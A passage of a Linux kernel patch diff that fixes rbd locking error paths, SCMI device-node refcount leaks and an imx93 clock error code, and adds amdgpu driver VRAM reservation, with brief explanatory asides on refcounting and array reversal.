+ 	for (i = 0; i < num_watchers; i++) {
+@@ -3986,8 +3988,12 @@ static int rbd_try_lock(struct rbd_device *rbd_dev)
+ 		locker = refreshed_locker = NULL;
+ 
+ 		ret = rbd_lock(rbd_dev);
+-		if (ret != -EBUSY)
++		if (!ret)
++			goto out;
++		if (ret != -EBUSY) {
++			rbd_warn(rbd_dev, "failed to lock header: %d", ret);
+ 			goto out;
++		}
+ 
+ 		/* determine if the current lock holder is still alive */
+ 		locker = get_lock_owner_info(rbd_dev);
+@@ -4090,11 +4096,8 @@ static int rbd_try_acquire_lock(struct rbd_device *rbd_dev)
+ 
+ 	ret = rbd_try_lock(rbd_dev);
+ 	if (ret < 0) {
+-		rbd_warn(rbd_dev, "failed to lock header: %d", ret);
+-		if (ret == -EBLOCKLISTED)
+-			goto out;
+-
+-		ret = 1; /* request lock anyway */
++		rbd_warn(rbd_dev, "failed to acquire lock: %d", ret);
++		goto out;
+ 	}
+ 	if (ret > 0) {
+ 		up_write(&rbd_dev->lock_rwsem);
+@@ -6628,12 +6631,11 @@ static int rbd_add_acquire_lock(struct rbd_device *rbd_dev)
+ 		cancel_delayed_work_sync(&rbd_dev->lock_dwork);
+ 		if (!ret)
+ 			ret = -ETIMEDOUT;
+-	}
+ 
+-	if (ret) {
+-		rbd_warn(rbd_dev, "failed to acquire exclusive lock: %ld", ret);
+-		return ret;
++		rbd_warn(rbd_dev, "failed to acquire lock: %ld", ret);
+ 	}
++	if (ret)
++		return ret;
+ 
+ 	/*
+ 	 * The lock may have been released by now, unless automatic lock
+diff --git a/drivers/clk/imx/clk-imx93.c b/drivers/clk/imx/clk-imx93.c
+index 5e3d299190c89..61d9f9bf86e63 100644
+--- a/drivers/clk/imx/clk-imx93.c
++++ b/drivers/clk/imx/clk-imx93.c
+@@ -288,7 +288,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	anatop_base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+ 	if (WARN_ON(IS_ERR(anatop_base))) {
+-		ret = PTR_ERR(base);
++		ret = PTR_ERR(anatop_base);
+ 		goto unregister_hws;
+ 	}
+ 
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index a455f3c0e98b2..25d31dfdad15d 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -106,8 +106,10 @@ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 		return -ENOMEM;
+ 
+ 	shmem = of_parse_phandle(cdev->of_node, "shmem", idx);
+-	if (!of_device_is_compatible(shmem, "arm,scmi-shmem"))
++	if (!of_device_is_compatible(shmem, "arm,scmi-shmem")) {
++		of_node_put(shmem);
+ 		return -ENXIO;
++	}
+ 
+ 	ret = of_address_to_resource(shmem, 0, &res);
+ 	of_node_put(shmem);
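
This fix and the smc.c one further down enforce the same refcounting rule: of_parse_phandle() hands back a device node with its refcount elevated, so every exit path, error paths included, must balance it with of_node_put(). A minimal kernel-context sketch of the corrected shape (illustrative only, not the driver code; of_node_put(NULL) is a no-op, so the NULL case is covered too):

#include <linux/of.h>	/* of_parse_phandle(), of_device_is_compatible() */

static int parse_shmem_compat(struct device_node *parent, int idx)
{
	struct device_node *shmem;

	shmem = of_parse_phandle(parent, "shmem", idx);	/* takes a reference */
	if (!of_device_is_compatible(shmem, "arm,scmi-shmem")) {
		of_node_put(shmem);	/* the path that used to leak */
		return -ENXIO;
	}
	/* ... map the region described by shmem ... */
	of_node_put(shmem);		/* balanced on success as well */
	return 0;
}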
+diff --git a/drivers/firmware/arm_scmi/smc.c b/drivers/firmware/arm_scmi/smc.c
+index 87a7b13cf868b..ac0bd51ef16a2 100644
+--- a/drivers/firmware/arm_scmi/smc.c
++++ b/drivers/firmware/arm_scmi/smc.c
+@@ -23,6 +23,7 @@
+ /**
+  * struct scmi_smc - Structure representing a SCMI smc transport
+  *
++ * @irq: An optional IRQ for completion
+  * @cinfo: SCMI channel info
+  * @shmem: Transmit/Receive shared memory area
+  * @shmem_lock: Lock to protect access to Tx/Rx shared memory area.
+@@ -33,6 +34,7 @@
+  */
+ 
+ struct scmi_smc {
++	int irq;
+ 	struct scmi_chan_info *cinfo;
+ 	struct scmi_shared_mem __iomem *shmem;
+ 	/* Protect access to shmem area */
+@@ -106,7 +108,7 @@ static int smc_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	struct resource res;
+ 	struct device_node *np;
+ 	u32 func_id;
+-	int ret, irq;
++	int ret;
+ 
+ 	if (!tx)
+ 		return -ENODEV;
+@@ -116,8 +118,10 @@ static int smc_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 		return -ENOMEM;
+ 
+ 	np = of_parse_phandle(cdev->of_node, "shmem", 0);
+-	if (!of_device_is_compatible(np, "arm,scmi-shmem"))
++	if (!of_device_is_compatible(np, "arm,scmi-shmem")) {
++		of_node_put(np);
+ 		return -ENXIO;
++	}
+ 
+ 	ret = of_address_to_resource(np, 0, &res);
+ 	of_node_put(np);
+@@ -142,11 +146,10 @@ static int smc_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	 * completion of a message is signaled by an interrupt rather than by
+ 	 * the return of the SMC call.
+ 	 */
+-	irq = of_irq_get_byname(cdev->of_node, "a2p");
+-	if (irq > 0) {
+-		ret = devm_request_irq(dev, irq, smc_msg_done_isr,
+-				       IRQF_NO_SUSPEND,
+-				       dev_name(dev), scmi_info);
++	scmi_info->irq = of_irq_get_byname(cdev->of_node, "a2p");
++	if (scmi_info->irq > 0) {
++		ret = request_irq(scmi_info->irq, smc_msg_done_isr,
++				  IRQF_NO_SUSPEND, dev_name(dev), scmi_info);
+ 		if (ret) {
+ 			dev_err(dev, "failed to setup SCMI smc irq\n");
+ 			return ret;
+@@ -168,6 +171,10 @@ static int smc_chan_free(int id, void *p, void *data)
+ 	struct scmi_chan_info *cinfo = p;
+ 	struct scmi_smc *scmi_info = cinfo->transport_info;
+ 
++	/* Ignore any possible further reception on the IRQ path */
++	if (scmi_info->irq > 0)
++		free_irq(scmi_info->irq, scmi_info);
++
+ 	cinfo->transport_info = NULL;
+ 	scmi_info->cinfo = NULL;
+ 
+diff --git a/drivers/firmware/smccc/soc_id.c b/drivers/firmware/smccc/soc_id.c
+index 890eb454599a3..1990263fbba0e 100644
+--- a/drivers/firmware/smccc/soc_id.c
++++ b/drivers/firmware/smccc/soc_id.c
+@@ -34,7 +34,6 @@ static struct soc_device_attribute *soc_dev_attr;
+ 
+ static int __init smccc_soc_init(void)
+ {
+-	struct arm_smccc_res res;
+ 	int soc_id_rev, soc_id_version;
+ 	static char soc_id_str[20], soc_id_rev_str[12];
+ 	static char soc_id_jep106_id_str[12];
+@@ -49,13 +48,13 @@ static int __init smccc_soc_init(void)
+ 	}
+ 
+ 	if (soc_id_version < 0) {
+-		pr_err("ARCH_SOC_ID(0) returned error: %lx\n", res.a0);
++		pr_err("Invalid SoC Version: %x\n", soc_id_version);
+ 		return -EINVAL;
+ 	}
+ 
+ 	soc_id_rev = arm_smccc_get_soc_id_revision();
+ 	if (soc_id_rev < 0) {
+-		pr_err("ARCH_SOC_ID(1) returned error: %lx\n", res.a0);
++		pr_err("Invalid SoC Revision: %x\n", soc_id_rev);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+index b81b77a9efa61..9b97fa39d47a2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+@@ -101,39 +101,97 @@ void amdgpu_atomfirmware_scratch_regs_init(struct amdgpu_device *adev)
+ 	}
+ }
+ 
++static int amdgpu_atomfirmware_allocate_fb_v2_1(struct amdgpu_device *adev,
++	struct vram_usagebyfirmware_v2_1 *fw_usage, int *usage_bytes)
++{
++	uint32_t start_addr, fw_size, drv_size;
++
++	start_addr = le32_to_cpu(fw_usage->start_address_in_kb);
++	fw_size = le16_to_cpu(fw_usage->used_by_firmware_in_kb);
++	drv_size = le16_to_cpu(fw_usage->used_by_driver_in_kb);
++
++	DRM_DEBUG("atom firmware v2_1 requested %08x %dkb fw %dkb drv\n",
++			  start_addr,
++			  fw_size,
++			  drv_size);
++
++	if ((start_addr & ATOM_VRAM_OPERATION_FLAGS_MASK) ==
++		(uint32_t)(ATOM_VRAM_BLOCK_SRIOV_MSG_SHARE_RESERVATION <<
++		ATOM_VRAM_OPERATION_FLAGS_SHIFT)) {
++		/* Firmware requests VRAM reservation for SR-IOV */
++		adev->mman.fw_vram_usage_start_offset = (start_addr &
++			(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
++		adev->mman.fw_vram_usage_size = fw_size << 10;
++		/* Use the default scratch size */
++		*usage_bytes = 0;
++	} else {
++		*usage_bytes = drv_size << 10;
++	}
++	return 0;
++}
++
++static int amdgpu_atomfirmware_allocate_fb_v2_2(struct amdgpu_device *adev,
++		struct vram_usagebyfirmware_v2_2 *fw_usage, int *usage_bytes)
++{
++	uint32_t fw_start_addr, fw_size, drv_start_addr, drv_size;
++
++	fw_start_addr = le32_to_cpu(fw_usage->fw_region_start_address_in_kb);
++	fw_size = le16_to_cpu(fw_usage->used_by_firmware_in_kb);
++
++	drv_start_addr = le32_to_cpu(fw_usage->driver_region0_start_address_in_kb);
++	drv_size = le32_to_cpu(fw_usage->used_by_driver_region0_in_kb);
++
++	DRM_DEBUG("atom requested fw start at %08x %dkb and drv start at %08x %dkb\n",
++			  fw_start_addr,
++			  fw_size,
++			  drv_start_addr,
++			  drv_size);
++
++	if ((fw_start_addr & (ATOM_VRAM_BLOCK_NEEDS_NO_RESERVATION << 30)) == 0) {
++		/* Firmware requests VRAM reservation for SR-IOV */
++		adev->mman.fw_vram_usage_start_offset = (fw_start_addr &
++			(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
++		adev->mman.fw_vram_usage_size = fw_size << 10;
++	}
++
++	if ((drv_start_addr & (ATOM_VRAM_BLOCK_NEEDS_NO_RESERVATION << 30)) == 0) {
++		/* Driver requests VRAM reservation for SR-IOV */
++		adev->mman.drv_vram_usage_start_offset = (drv_start_addr &
++			(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
++		adev->mman.drv_vram_usage_size = drv_size << 10;
++	}
++
++	*usage_bytes = 0;
++	return 0;
++}
++
+ int amdgpu_atomfirmware_allocate_fb_scratch(struct amdgpu_device *adev)
+ {
+ 	struct atom_context *ctx = adev->mode_info.atom_context;
+ 	int index = get_index_into_master_table(atom_master_list_of_data_tables_v2_1,
+ 						vram_usagebyfirmware);
+-	struct vram_usagebyfirmware_v2_1 *firmware_usage;
+-	uint32_t start_addr, size;
++	struct vram_usagebyfirmware_v2_1 *fw_usage_v2_1;
++	struct vram_usagebyfirmware_v2_2 *fw_usage_v2_2;
+ 	uint16_t data_offset;
++	uint8_t frev, crev;
+ 	int usage_bytes = 0;
+ 
+-	if (amdgpu_atom_parse_data_header(ctx, index, NULL, NULL, NULL, &data_offset)) {
+-		firmware_usage = (struct vram_usagebyfirmware_v2_1 *)(ctx->bios + data_offset);
+-		DRM_DEBUG("atom firmware requested %08x %dkb fw %dkb drv\n",
+-			  le32_to_cpu(firmware_usage->start_address_in_kb),
+-			  le16_to_cpu(firmware_usage->used_by_firmware_in_kb),
+-			  le16_to_cpu(firmware_usage->used_by_driver_in_kb));
+-
+-		start_addr = le32_to_cpu(firmware_usage->start_address_in_kb);
+-		size = le16_to_cpu(firmware_usage->used_by_firmware_in_kb);
+-
+-		if ((uint32_t)(start_addr & ATOM_VRAM_OPERATION_FLAGS_MASK) ==
+-			(uint32_t)(ATOM_VRAM_BLOCK_SRIOV_MSG_SHARE_RESERVATION <<
+-			ATOM_VRAM_OPERATION_FLAGS_SHIFT)) {
+-			/* Firmware request VRAM reservation for SR-IOV */
+-			adev->mman.fw_vram_usage_start_offset = (start_addr &
+-				(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
+-			adev->mman.fw_vram_usage_size = size << 10;
+-			/* Use the default scratch size */
+-			usage_bytes = 0;
+-		} else {
+-			usage_bytes = le16_to_cpu(firmware_usage->used_by_driver_in_kb) << 10;
++	if (amdgpu_atom_parse_data_header(ctx, index, NULL, &frev, &crev, &data_offset)) {
++		if (frev == 2 && crev == 1) {
++			fw_usage_v2_1 =
++				(struct vram_usagebyfirmware_v2_1 *)(ctx->bios + data_offset);
++			amdgpu_atomfirmware_allocate_fb_v2_1(adev,
++					fw_usage_v2_1,
++					&usage_bytes);
++		} else if (frev >= 2 && crev >= 2) {
++			fw_usage_v2_2 =
++				(struct vram_usagebyfirmware_v2_2 *)(ctx->bios + data_offset);
++			amdgpu_atomfirmware_allocate_fb_v2_2(adev,
++					fw_usage_v2_2,
++					&usage_bytes);
+ 		}
+ 	}
++
+ 	ctx->scratch_size_bytes = 0;
+ 	if (usage_bytes == 0)
+ 		usage_bytes = 20 * 1024;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index ad8cb9e6d1ab0..0ee7c935fba1f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -347,17 +347,16 @@ int amdgpu_bo_create_kernel(struct amdgpu_device *adev,
+  * @adev: amdgpu device object
+  * @offset: offset of the BO
+  * @size: size of the BO
+- * @domain: where to place it
+  * @bo_ptr:  used to initialize BOs in structures
+  * @cpu_addr: optional CPU address mapping
+  *
+- * Creates a kernel BO at a specific offset in the address space of the domain.
++ * Creates a kernel BO at a specific offset in VRAM.
+  *
+  * Returns:
+  * 0 on success, negative error code otherwise.
+  */
+ int amdgpu_bo_create_kernel_at(struct amdgpu_device *adev,
+-			       uint64_t offset, uint64_t size, uint32_t domain,
++			       uint64_t offset, uint64_t size,
+ 			       struct amdgpu_bo **bo_ptr, void **cpu_addr)
+ {
+ 	struct ttm_operation_ctx ctx = { false, false };
+@@ -367,8 +366,9 @@ int amdgpu_bo_create_kernel_at(struct amdgpu_device *adev,
+ 	offset &= PAGE_MASK;
+ 	size = ALIGN(size, PAGE_SIZE);
+ 
+-	r = amdgpu_bo_create_reserved(adev, size, PAGE_SIZE, domain, bo_ptr,
+-				      NULL, cpu_addr);
++	r = amdgpu_bo_create_reserved(adev, size, PAGE_SIZE,
++				      AMDGPU_GEM_DOMAIN_VRAM, bo_ptr, NULL,
++				      cpu_addr);
+ 	if (r)
+ 		return r;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 147b79c10cbb6..93207badf83f3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -284,7 +284,7 @@ int amdgpu_bo_create_kernel(struct amdgpu_device *adev,
+ 			    u32 domain, struct amdgpu_bo **bo_ptr,
+ 			    u64 *gpu_addr, void **cpu_addr);
+ int amdgpu_bo_create_kernel_at(struct amdgpu_device *adev,
+-			       uint64_t offset, uint64_t size, uint32_t domain,
++			       uint64_t offset, uint64_t size,
+ 			       struct amdgpu_bo **bo_ptr, void **cpu_addr);
+ int amdgpu_bo_create_user(struct amdgpu_device *adev,
+ 			  struct amdgpu_bo_param *bp,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index b64938ed8cb68..10469f20a10ca 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -1537,6 +1537,23 @@ static void amdgpu_ttm_fw_reserve_vram_fini(struct amdgpu_device *adev)
+ 		NULL, &adev->mman.fw_vram_usage_va);
+ }
+ 
++/*
++ * Driver Reservation functions
++ */
++/**
++ * amdgpu_ttm_drv_reserve_vram_fini - free drv reserved vram
++ *
++ * @adev: amdgpu_device pointer
++ *
++ * free drv reserved vram if it has been reserved.
++ */
++static void amdgpu_ttm_drv_reserve_vram_fini(struct amdgpu_device *adev)
++{
++	amdgpu_bo_free_kernel(&adev->mman.drv_vram_usage_reserved_bo,
++						  NULL,
++						  NULL);
++}
++
+ /**
+  * amdgpu_ttm_fw_reserve_vram_init - create bo vram reservation from fw
+  *
+@@ -1558,11 +1575,34 @@ static int amdgpu_ttm_fw_reserve_vram_init(struct amdgpu_device *adev)
+ 	return amdgpu_bo_create_kernel_at(adev,
+ 					  adev->mman.fw_vram_usage_start_offset,
+ 					  adev->mman.fw_vram_usage_size,
+-					  AMDGPU_GEM_DOMAIN_VRAM,
+ 					  &adev->mman.fw_vram_usage_reserved_bo,
+ 					  &adev->mman.fw_vram_usage_va);
+ }
+ 
++/**
++ * amdgpu_ttm_drv_reserve_vram_init - create bo vram reservation from driver
++ *
++ * @adev: amdgpu_device pointer
++ *
++ * create bo vram reservation from drv.
++ */
++static int amdgpu_ttm_drv_reserve_vram_init(struct amdgpu_device *adev)
++{
++	uint64_t vram_size = adev->gmc.visible_vram_size;
++
++	adev->mman.drv_vram_usage_reserved_bo = NULL;
++
++	if (adev->mman.drv_vram_usage_size == 0 ||
++	    adev->mman.drv_vram_usage_size > vram_size)
++		return 0;
++
++	return amdgpu_bo_create_kernel_at(adev,
++					  adev->mman.drv_vram_usage_start_offset,
++					  adev->mman.drv_vram_usage_size,
++					  &adev->mman.drv_vram_usage_reserved_bo,
++					  NULL);
++}
++
+ /*
+  * Memory training reservation functions
+  */
+@@ -1585,14 +1625,15 @@ static int amdgpu_ttm_training_reserve_vram_fini(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
+-static void amdgpu_ttm_training_data_block_init(struct amdgpu_device *adev)
++static void amdgpu_ttm_training_data_block_init(struct amdgpu_device *adev,
++						uint32_t reserve_size)
+ {
+ 	struct psp_memory_training_context *ctx = &adev->psp.mem_train_ctx;
+ 
+ 	memset(ctx, 0, sizeof(*ctx));
+ 
+ 	ctx->c2p_train_data_offset =
+-		ALIGN((adev->gmc.mc_vram_size - adev->mman.discovery_tmr_size - SZ_1M), SZ_1M);
++		ALIGN((adev->gmc.mc_vram_size - reserve_size - SZ_1M), SZ_1M);
+ 	ctx->p2c_train_data_offset =
+ 		(adev->gmc.mc_vram_size - GDDR6_MEM_TRAINING_OFFSET);
+ 	ctx->train_data_size =
+@@ -1610,9 +1651,10 @@ static void amdgpu_ttm_training_data_block_init(struct amdgpu_device *adev)
+  */
+ static int amdgpu_ttm_reserve_tmr(struct amdgpu_device *adev)
+ {
+-	int ret;
+ 	struct psp_memory_training_context *ctx = &adev->psp.mem_train_ctx;
+ 	bool mem_train_support = false;
++	uint32_t reserve_size = 0;
++	int ret;
+ 
+ 	if (!amdgpu_sriov_vf(adev)) {
+ 		if (amdgpu_atomfirmware_mem_training_supported(adev))
+@@ -1628,18 +1670,18 @@ static int amdgpu_ttm_reserve_tmr(struct amdgpu_device *adev)
+ 	 * Otherwise, fallback to legacy approach to check and reserve tmr block for ip
+ 	 * discovery data and G6 memory training data respectively
+ 	 */
+-	adev->mman.discovery_tmr_size =
+-		amdgpu_atomfirmware_get_fw_reserved_fb_size(adev);
+-	if (!adev->mman.discovery_tmr_size)
+-		adev->mman.discovery_tmr_size = DISCOVERY_TMR_OFFSET;
++	if (adev->bios)
++		reserve_size =
++			amdgpu_atomfirmware_get_fw_reserved_fb_size(adev);
++	if (!reserve_size)
++		reserve_size = DISCOVERY_TMR_OFFSET;
+ 
+ 	if (mem_train_support) {
+ 		/* reserve vram for mem train according to TMR location */
+-		amdgpu_ttm_training_data_block_init(adev);
++		amdgpu_ttm_training_data_block_init(adev, reserve_size);
+ 		ret = amdgpu_bo_create_kernel_at(adev,
+ 					 ctx->c2p_train_data_offset,
+ 					 ctx->train_data_size,
+-					 AMDGPU_GEM_DOMAIN_VRAM,
+ 					 &ctx->c2p_bo,
+ 					 NULL);
+ 		if (ret) {
+@@ -1651,14 +1693,14 @@ static int amdgpu_ttm_reserve_tmr(struct amdgpu_device *adev)
+ 	}
+ 
+ 	ret = amdgpu_bo_create_kernel_at(adev,
+-				adev->gmc.real_vram_size - adev->mman.discovery_tmr_size,
+-				adev->mman.discovery_tmr_size,
+-				AMDGPU_GEM_DOMAIN_VRAM,
+-				&adev->mman.discovery_memory,
++				adev->gmc.real_vram_size - reserve_size,
++				reserve_size,
++				&adev->mman.fw_reserved_memory,
+ 				NULL);
+ 	if (ret) {
+ 		DRM_ERROR("alloc tmr failed(%d)!\n", ret);
+-		amdgpu_bo_free_kernel(&adev->mman.discovery_memory, NULL, NULL);
++		amdgpu_bo_free_kernel(&adev->mman.fw_reserved_memory,
++				      NULL, NULL);
+ 		return ret;
+ 	}
+ 
+@@ -1730,6 +1772,14 @@ int amdgpu_ttm_init(struct amdgpu_device *adev)
+ 		return r;
+ 	}
+ 
++	/*
++	 * The reserved VRAM for the driver must be pinned to the specified
++	 * place in VRAM, so reserve it early.
++	 */
++	r = amdgpu_ttm_drv_reserve_vram_init(adev);
++	if (r)
++		return r;
++
+ 	/*
+ 	 * only NAVI10 and onwards ASIC support for IP discovery.
+ 	 * If IP discovery enabled, a block of memory should be
+@@ -1746,21 +1796,18 @@ int amdgpu_ttm_init(struct amdgpu_device *adev)
+ 	 * avoid display artifacts while transitioning between pre-OS
+ 	 * and driver.  */
+ 	r = amdgpu_bo_create_kernel_at(adev, 0, adev->mman.stolen_vga_size,
+-				       AMDGPU_GEM_DOMAIN_VRAM,
+ 				       &adev->mman.stolen_vga_memory,
+ 				       NULL);
+ 	if (r)
+ 		return r;
+ 	r = amdgpu_bo_create_kernel_at(adev, adev->mman.stolen_vga_size,
+ 				       adev->mman.stolen_extended_size,
+-				       AMDGPU_GEM_DOMAIN_VRAM,
+ 				       &adev->mman.stolen_extended_memory,
+ 				       NULL);
+ 	if (r)
+ 		return r;
+ 	r = amdgpu_bo_create_kernel_at(adev, adev->mman.stolen_reserved_offset,
+ 				       adev->mman.stolen_reserved_size,
+-				       AMDGPU_GEM_DOMAIN_VRAM,
+ 				       &adev->mman.stolen_reserved_memory,
+ 				       NULL);
+ 	if (r)
+@@ -1847,14 +1894,16 @@ void amdgpu_ttm_fini(struct amdgpu_device *adev)
+ 	/* return the stolen vga memory back to VRAM */
+ 	amdgpu_bo_free_kernel(&adev->mman.stolen_vga_memory, NULL, NULL);
+ 	amdgpu_bo_free_kernel(&adev->mman.stolen_extended_memory, NULL, NULL);
+-	/* return the IP Discovery TMR memory back to VRAM */
+-	amdgpu_bo_free_kernel(&adev->mman.discovery_memory, NULL, NULL);
++	/* return the FW reserved memory back to VRAM */
++	amdgpu_bo_free_kernel(&adev->mman.fw_reserved_memory, NULL,
++			      NULL);
+ 	if (adev->mman.stolen_reserved_size)
+ 		amdgpu_bo_free_kernel(&adev->mman.stolen_reserved_memory,
+ 				      NULL, NULL);
+ 	amdgpu_bo_free_kernel(&adev->mman.sdma_access_bo, NULL,
+ 					&adev->mman.sdma_access_ptr);
+ 	amdgpu_ttm_fw_reserve_vram_fini(adev);
++	amdgpu_ttm_drv_reserve_vram_fini(adev);
+ 
+ 	if (drm_dev_enter(adev_to_drm(adev), &idx)) {
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h
+index a37207011a69a..0fefa5e3a524b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h
+@@ -78,7 +78,8 @@ struct amdgpu_mman {
+ 	/* discovery */
+ 	uint8_t				*discovery_bin;
+ 	uint32_t			discovery_tmr_size;
+-	struct amdgpu_bo		*discovery_memory;
++	/* fw reserved memory */
++	struct amdgpu_bo		*fw_reserved_memory;
+ 
+ 	/* firmware VRAM reservation */
+ 	u64		fw_vram_usage_start_offset;
+@@ -86,6 +87,11 @@ struct amdgpu_mman {
+ 	struct amdgpu_bo	*fw_vram_usage_reserved_bo;
+ 	void		*fw_vram_usage_va;
+ 
++	/* driver VRAM reservation */
++	u64		drv_vram_usage_start_offset;
++	u64		drv_vram_usage_size;
++	struct amdgpu_bo	*drv_vram_usage_reserved_bo;
++
+ 	/* PAGE_SIZE'd BO for process memory r/w over SDMA. */
+ 	struct amdgpu_bo	*sdma_access_bo;
+ 	void			*sdma_access_ptr;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index c73abe54d9747..81549f1edfe01 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -391,7 +391,6 @@ static void amdgpu_virt_ras_reserve_bps(struct amdgpu_device *adev)
+ 		 */
+ 		if (amdgpu_bo_create_kernel_at(adev, bp << AMDGPU_GPU_PAGE_SHIFT,
+ 					       AMDGPU_GPU_PAGE_SIZE,
+-					       AMDGPU_GEM_DOMAIN_VRAM,
+ 					       &bo, NULL))
+ 			DRM_DEBUG("RAS WARN: reserve vram for retired page %llx fail\n", bp);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9b2915764306b..86e07cc1d3dcc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -351,6 +351,19 @@ static inline bool is_dc_timing_adjust_needed(struct dm_crtc_state *old_state,
+ 		return false;
+ }
+ 
++static inline void reverse_planes_order(struct dc_surface_update *array_of_surface_update,
++					int planes_count)
++{
++	int i, j;
++	struct dc_surface_update surface_updates_temp;
++
++	for (i = 0, j = planes_count - 1; i < j; i++, j--) {
++		surface_updates_temp = array_of_surface_update[i];
++		array_of_surface_update[i] = array_of_surface_update[j];
++		array_of_surface_update[j] = surface_updates_temp;
++	}
++}
++
+ /**
+  * update_planes_and_stream_adapter() - Send planes to be updated in DC
+  *
+@@ -367,6 +380,8 @@ static inline bool update_planes_and_stream_adapter(struct dc *dc,
+ 						    struct dc_stream_update *stream_update,
+ 						    struct dc_surface_update *array_of_surface_update)
+ {
++	reverse_planes_order(array_of_surface_update, planes_count);
++
+ 	/*
+ 	 * Previous frame finished and HW is ready for optimization.
+ 	 */
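
reverse_planes_order() is a textbook two-index in-place reversal, flipping the surface-update array into the order DC consumes. The same pattern in a minimal standalone form:

#include <stdio.h>

static void reverse(int *a, int n)
{
	int i, j, tmp;

	/* Converging indices; stops at the middle for odd and even n alike. */
	for (i = 0, j = n - 1; i < j; i++, j--) {
		tmp = a[i];
		a[i] = a[j];
		a[j] = tmp;
	}
}

int main(void)
{
	int planes[] = { 0, 1, 2, 3 };
	int i;

	reverse(planes, 4);
	for (i = 0; i < 4; i++)
		printf("%d ", planes[i]);	/* prints: 3 2 1 0 */
	printf("\n");
	return 0;
}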
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 5d53e54ebe90b..c2c6c4587a5ce 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -2092,6 +2092,7 @@ static enum dc_status enable_link_dp_mst(
+ 		struct pipe_ctx *pipe_ctx)
+ {
+ 	struct dc_link *link = pipe_ctx->stream->link;
++	unsigned char mstm_cntl;
+ 
+ 	/* sink signal type after MST branch is MST. Multiple MST sinks
+ 	 * share one link. Link DP PHY is enable or training only once.
+@@ -2100,7 +2101,9 @@ static enum dc_status enable_link_dp_mst(
+ 		return DC_OK;
+ 
+ 	/* clear payload table */
+-	dm_helpers_dp_mst_clear_payload_allocation_table(link->ctx, link);
++	core_link_read_dpcd(link, DP_MSTM_CTRL, &mstm_cntl, 1);
++	if (mstm_cntl & DP_MST_EN)
++		dm_helpers_dp_mst_clear_payload_allocation_table(link->ctx, link);
+ 
+ 	/* to make sure the pending down rep can be processed
+ 	 * before enabling the link
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index ff855cb21d3f9..bbe1337a8cee3 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -705,20 +705,65 @@ struct atom_gpio_pin_lut_v2_1
+ };
+ 
+ 
+-/* 
+-  ***************************************************************************
+-    Data Table vram_usagebyfirmware  structure
+-  ***************************************************************************
+-*/
++/*
++ * VBIOS/PRE-OS always reserves an FB region at the top of the frame buffer. Drivers must not
++ * write to that region. A driver can allocate its own reservation region as long as it does not
++ * overlap the firmware's reservation region.
++ * if (pre-NV1X) atom data table firmwareInfoTable version < 3.3:
++ * in this case, atom data table vram_usagebyfirmwareTable version always <= 2.1
++ *   if VBIOS/UEFI GOP is posted:
++ *     VBIOS/UEFIGOP update used_by_firmware_in_kb = total reserved size by VBIOS
++ *     update start_address_in_kb = total_mem_size_in_kb - used_by_firmware_in_kb;
++ *     ( total_mem_size_in_kb = reg(CONFIG_MEMSIZE)<<10)
++ *     driver can allocate driver reservation region under firmware reservation,
++ *     used_by_driver_in_kb = driver reservation size
